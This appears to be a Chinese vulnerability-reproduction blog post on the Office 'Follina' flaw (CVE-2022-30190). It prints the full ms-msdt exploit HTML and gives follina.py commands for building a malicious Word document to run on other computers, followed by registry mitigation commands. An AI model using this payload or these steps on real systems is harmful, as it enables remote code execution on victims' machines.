文章目录

  • 一、CVE-2022-30190是什么?
  • 二、使用步骤
  • 三、进行其他尝试
  • 总结

一、CVE-2022-30190是什么?

漏洞原理见:https://www.bleepingcomputer.com/news/security/new-microsoft-office-zero-day-used-in-attacks-to-execute-powershell/

核心总结就是:恶意的Word文档,使用远程模板功能,以从一个远程服务器获取HTML文件。HTML代码然后使用微软的MS-MSDT URI协议执行PowerShell代码。

当然从后面exploit.html源码看的确是:

<!doctype html>
<html lang="en">
<head>
<title>
Good thing we disabled macros
</title>
</head>
<body>
<p>
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In quis lectus massa. Pellentesque quis pretium massa. Vivamus facilisis ultricies massa ac commodo. Nam nec congue magna. Nullam laoreet justo ut vehicula lobortis.Aliquam rutrum orci tortor, non porta odio feugiat eu. Vivamus nulla mauris, eleifend eu egestas scelerisque, vulputate id est. Proin rutrum nec metus convallis ornare. Ut ultricies ante et dictum imperdiet. Ut nisl magna, porttitor nec odio non, dapibus maximus nibh. Integer lorem felis, accumsan a dapibus hendrerit, maximus nec leo. Vestibulum porta, orci sed dignissim porta, sem justo porta odio, quis rutrum tortor arcu quis massa. Aenean eleifend nisi a quam faucibus, quis scelerisque lectus condimentum. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Proin non dui nec odio finibus molestie. Suspendisse id massa nunc. Sed ultricies et sapien vel fringilla.
</p>
<p>
Donec tincidunt ac justo et iaculis. Pellentesque lacinia, neque at consectetur porttitor, leo eros bibendum lorem, eu sollicitudin dolor urna pharetra augue. Pellentesque facilisis orci quis ante tempor, ac varius eros blandit. Nulla vulputate, purus eu consectetur ullamcorper, mauris nulla commodo dolor, in maximus purus mi eget purus. In mauris diam, imperdiet ac dignissim ut, mollis in purus. In congue volutpat tortor eu auctor. Nullam a eros lectus. Aenean porta semper quam ac lacinia. Curabitur interdum, nisl eu laoreet tempus, augue nisl volutpat odio, dictum aliquam massa orci sit amet magna.Duis pulvinar vitae neque non placerat. Nullam at dui diam. In hac habitasse platea dictumst. Sed quis mattis libero. Nullam sit amet condimentum est. Nulla eget blandit elit. Nunc facilisis erat nec ligula ultrices, malesuada mollis ex porta. Phasellus iaculis lorem eu augue tincidunt, in ultrices massa suscipit. Donec gravida sapien ac dui interdum cursus. In finibus eu dolor sit amet porta. Sed ultrices nisl dui, at lacinia lectus porttitor ut.Ut ac viverra risus. Suspendisse lacus nunc, porttitor facilisis mauris ut, ullamcorper gravida dolor. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus sollicitudin, arcu id sagittis facilisis, turpis dolor eleifend massa, in maximus sapien dui et tortor. Quisque varius enim sed enim venenatis tempor. Praesent quis volutpat lorem. Pellentesque ac venenatis lacus, vitae commodo odio. Sed in metus at libero viverra mollis sed vitae nibh. Sed at semper lectus.
</p>
<p>
Proin a interdum justo. Duis sed dui vitae ex molestie egestas et tincidunt neque. Fusce lectus tellus, pharetra id ex at, consectetur hendrerit nibh. Nulla sit amet commodo risus. Nulla sed dapibus ante, sit amet fringilla dui. Nunc lectus mauris, porttitor quis eleifend nec, suscipit sit amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus.Morbi convallis fringilla tortor, at consequat purus vulputate sit amet. Morbi a ultricies risus, id maximus purus. Fusce aliquet tortor id ante ornare, non auctor tortor luctus. Quisque laoreet, sem id porttitor eleifend, eros eros suscipit lectus, id facilisis lorem lorem nec nibh. Nullam venenatis ornare ornare. Donec varius ex ac faucibus condimentum. Aenean ultricies vitae mauris cursus ornare. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas aliquet felis vel nulla auctor, ac tempor mi mattis. Nam accumsan nisi vulputate, vestibulum nisl at, gravida erat. Nam diam metus, tempor id sapien eu, porta luctus felis. Aliquam luctus vitae tortor quis consectetur. In rutrum neque sit amet fermentum rutrum. Sed a velit at metus pretium tincidunt tristique eget nibh. In ultricies, est ut varius pulvinar, magna purus tristique arcu, et laoreet purus elit ac lectus. Ut venenatis tempus magna, non varius augue consectetur ut.Etiam elit risus, ullamcorper cursus nisl at, ultrices aliquet turpis. Maecenas vitae odio non dolor venenatis varius eu ac sem. Phasellus id tortor tellus. Ut vehicula, justo ac porta facilisis, mi sapien efficitur ipsum, sit fusce.
</p>
<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(\\windows\\system32\\calc)/.exe\"";
</script></body>
</html>

核心:location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(\\windows\\system32\\calc)/.exe\"";

二、使用步骤

1.payload下载

地址:

GitHub - chvancooten/follina.py: POC to replicate the full 'Follina' Office RCE vulnerability for testing purposes

2.步骤实现

2.1在存放payload的文件夹下

1)创建一个world文档,内容随便输入

2)将文档后缀改为.zip-->再解压

3)将word目录下_res文件下的document.xml.rels复制出来;在1)中文件创建src文件夹并将复制出来的document.xml.rels加上.tpl后缀

4)在创建www文件夹

5)创建exploit.html文件,内容在文章最前面;将exploit.html加后缀放入src目录下

6)在存放payload的文件夹下打开cmd,输入命令:

python .\follina.py -t docx -m binary -b calc.exe

7)访问地址: http://localhost:80/exploit.html(可尝试更换不同的浏览器)

点击允许

分析估计是由于我电脑中有杀软以及公司电脑强制打最新的安全补丁的原因没有出来计算器界面。

大家可查看CVE-2022-30190漏洞复现和检测——属于典型的无文件攻击场景之一 - bonelee - 博客园 (cnblogs.com)

进行其他的方式尝试。

3.进行其他尝试

在kali中

下载的exp目录中使用命令:python3  follina.py -r 7777

将会在目录中产生一个world文档将其上传到其他的电脑中并执行

漏洞成功复现:目前还没有解决方案。

修复建议:

分别执行以下命令:

reg export HKEY_CLASSES_ROOT\ms-msdt filename
reg delete HKEY_CLASSES_ROOT\ms-msdt /f

官方目前没有补丁公布。


总结

1.尝试使用对应的exp进行操作。

2.遇到相关执行问题,可根据执行exp提示进行创建相关的文件。

3.勇于尝试。

CVE-2022-30190 漏洞复现相关推荐

  1. CVE(2017-15715、2021-41773、2021-40438)漏洞复现

    仅用于学习参考,不要贪玩哦(*^▽^*) 目录 CVE-2017-15715 漏洞介绍 漏洞复现 CVE-2021-41773 漏洞介绍 漏洞复现 CVE-2021-40438 漏洞介绍 漏洞复现 一 ...

  2. (2022年12月最新)SpringBoot远程代码执行whitelabel error page SpEL RCE漏洞复现

    1. 漏洞原理 spring boot 处理参数值出错,流程进入org.springframework.util.PropertyPlaceholderHelper 类中 此时 URL 中的参数值会用 ...

  3. 2022年漏洞事件盘点

    2022年,网络安全漏洞形势空前严峻:高危漏洞数量延续增长趋势,企业安全预算和资源难以跟上黑客工具技术迭代和漏洞增长的速度,人工智能和量子计算等新技术风险加速到来,供应链和第三方风险不断累积,漏洞优先 ...

  4. MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现

    MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现 文章目录 MS08-067远程代码执行漏洞(CVE-2008-4250 ...

  5. CVE-2022-30190(follina):Microsoft诊断工具(MSDT)远程代码执行漏洞复现(超级详细)

    文章目录 免责声明 前言 一.漏洞简介 风险等级评判 二.影响版本 office版本 三.漏洞复现 复现环境 工具 使用方法 利用 第一种 第二种 防范避免 结尾 参考 免责声明 本文章仅供学习和研究 ...

  6. 漏洞复现 | Apache Shiro 授权绕过漏洞(CVE-2022-32532)

    0x00 漏洞描述 Apache Shiro 是一套用于执行认证.授权.加密和会话管理的 Java 安全框架.2022年06月29日 APache 官方发布了一则关于 Apache Shiro 的安全 ...

  7. CVE-2019-1388 Windows UAC 漏洞复现

    CVE-2019-1388 Windows UAC 漏洞复现 文章目录 CVE-2019-1388 Windows UAC 漏洞复现 1. 概述 1.1 UAC 1.2 漏洞简述 1.3 风险等级 1 ...

  8. Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328

    Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328 文章目录 Linux Privilege Esca ...

  9. 【MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6】

    MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6 文章目录 MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-01 ...

  10. android 动画 最顶层_【Android编程实战】StrandHogg漏洞复现及原理分析_Android系统上的维京海盗...

    0x00 StrandHogg漏洞详情 StrandHogg漏洞 CVE编号:暂无 [漏洞危害] 近日,Android平台上发现了一个高危漏洞 该漏洞允许攻击者冒充任意合法应用,诱导受害者授予恶意应用 ...

最新文章

  1. webform里的验证控件
  2. Alpha 测试和Beta的区别
  3. 充电类型一二次检测过程及充电类型
  4. spring 循环依赖注入
  5. 晋级赛关键一场遇到服务器中途维护,第四届全球争霸赛-大区赛常见问题说明...
  6. SilkierQuartz 1.0.21 发布, 是一个 Quartz.NET 的强大且简单的Web管理工具和承载组件...
  7. 如何打印出给定尺寸的方格_打印给定号码的表格| 8086微处理器
  8. iphone保修期多久_秒杀!仅9.9元起换iphone原厂电池!完美解决手机耗电快!
  9. 设计干货 | 时尚简约海报模板
  10. PyTorch 实现 GradCAM
  11. 易康(eCognition)对象几何特征--1:几何(Geometry)_范围(Extent)
  12. 时间序列的特征工程——针对Hurst指数的Python计算
  13. FL Studio20.9DAW宿主电子音乐制作软件
  14. AR体感大屏互动系统解决方案
  15. Android设置RecyclerView的Header和Footer
  16. ansible当中模块的使用
  17. 亚马逊这样做竞争大的产品更有优势
  18. 20款Adobe AIR小游戏
  19. arcgis不闭合线转面_ArcGIS不闭合线转面
  20. minigui[基础篇][9]—— 键盘和鼠标之鼠标

热门文章

  1. 基于matlab的OFDM通信链路仿真,输出OFDM频谱,星座图,收发时域波形
  2. 今日发现导出dbf类型为dBASE IV的文件,数据列不能超过40个,否则报错“字段将不能置于记录中”
  3. 【怀旧】 “AutoCAD 经典”界面
  4. 微信小程序常见问题汇总
  5. ARM 指令 LDR
  6. Echarts百度实例
  7. 第一部分 思科九年 一(13)
  8. gearsec.exe
  9. RabbitMQ学习(十五):消极确认(Negative Acknowledgements)
  10. [AJava]FusionCharts Free中文开发指南[使用文档教程]第十四章--在JSP里使用FCF